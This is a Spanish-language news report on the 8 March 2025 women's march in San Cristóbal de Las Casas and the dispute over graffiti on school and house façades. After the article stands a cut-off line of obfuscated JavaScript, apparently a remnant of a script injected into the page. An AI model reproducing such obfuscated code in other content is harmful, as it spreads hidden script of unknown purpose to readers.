Marcha del 8 de marzo en San Cristóbal genera controversia por pintas en fachadas

Redacción.

9 de marzo del 2025. San Cristóbal de Las Casas.- La marcha del 8 de marzo, en la que participaron alrededor de mil mujeres, transcurrió con normalidad en su recorrido habitual por las calles de San Cristóbal. Sin embargo, el evento generó controversia debido a las pintas realizadas en fachadas de casas particulares y varias instituciones educativas, lo que provocó molestias entre algunos ciudadanos.

Una de las participantes, madre soltera, expresó su frustración al ver que la fachada de la institución educativa primaria donde estudia su hija fue pintada, ya que el lugar había sido restaurado a través de aportaciones voluntarias de los padres, incluyéndola a ella, quien lucha todos los días por conseguir el dinero necesario para estas contribuciones. La mujer, visiblemente molesta, señaló que estos actos afectan directamente a las familias que dependen de la comunidad para la mejora de las infraestructuras.

A pesar de la incomodidad que provocaron las pintas, los organizadores de la marcha reiteraron que el objetivo de la manifestación es visibilizar la lucha por la igualdad de género y los derechos de las mujeres, aunque reconocieron que las expresiones de protesta deben respetar los bienes públicos y privados. La polémica acción dejó un debate abierto en la sociedad sobre los métodos de protesta y el respeto por los espacios de la comunidad.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Detienen a presunto agresor tras rápida intervención de la Policía Municipal en Las Gardenias

Yolanda Rodríguez/ corresponsal20 de julio del 2026. SCLC .- Elementos de la Dirección de Policía …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *